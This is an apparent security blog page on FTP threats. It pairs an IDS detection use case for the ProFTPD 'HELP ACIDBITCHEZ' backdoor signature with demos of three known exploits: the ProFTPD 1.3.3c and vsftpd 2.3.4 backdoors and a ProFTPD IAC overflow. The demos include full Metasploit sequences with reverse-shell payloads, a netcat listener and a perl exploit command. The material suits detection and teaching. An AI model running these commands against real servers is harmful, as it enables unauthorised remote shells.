Tag Archives: FTP

SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)

  • Use Case Reference : SUC028
  • Use Case Title : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
  • Use Case Detection : IDS / FTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Metasploit, Nessus, scripts, etc.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible(s) correlation(s) :

  • Pen-testing tools or home made scripts

Source(s) :

  • ProFTPD Backdoor demo

Emerging Threats SIG 2011994 triggers are :

  • The FTP content should contain “HELP ACIDBITCHEZ“, how is the backdoor command.
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET port 21/TCP.
SIG 2011994 1 year events activity
SIG 2011994 1 year events activity

OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution

Timeline :

Public release of the backdoor presence the 2010-12-01
Metasploit PoC provided the 2010-12-02

PoC provided by :

MC
darkharper2

Reference(s) :

OSVDB-69562

Affected version(s) :

proftpd-1.3.3c from the dates of 2010-11-28 to 2010-12-02

Tested on Ubuntu 10.0.4 LTS with :

proftpd-1.3.3c patched with diff

Description :

This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.

Commands :

use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
ifconfig

vsftpd v2.3.4 Backdoor Command Execution

Timeline :

Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04

PoC provided by :

hdm
mc

Reference(s) :

OSVDB-73573
Diff Pastbin
vsftpd alert

Affected version(s) :

vsftpd-2.3.4 from 2011-06-30 to 2011-07-03

Tested on Ubuntu Lucid 10.04.1 LTS with :

vsftpd-2.3.4

Description :

This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Commands :

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit

id
uname -a

CVE-2010-3867 : ProFTPD IAC Remote Root Exploit

Timeline :

Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07

PoC provided by :

jduck for Metasploit exploit
Kingcope for Exploit-DB exploit

Reference(s) :

CVE-2010-3867
EDB-15449

Affected version(s) :

ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :

ProFTPD proftpd-basic_1.3.3a-4_i386.deb

Description :

This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.

Metasploit Demo :

use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :

nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig